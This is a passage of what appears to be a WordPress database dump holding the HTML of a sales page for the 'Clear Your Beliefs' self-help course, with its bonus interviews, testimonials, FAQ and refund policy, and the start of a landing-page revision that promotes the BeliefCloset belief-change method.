<em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 800px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:04:29', '2014-06-18 02:04:29', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(995, 4194, '2014-06-17 21:08:24', '2014-06-18 02:08:24', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you 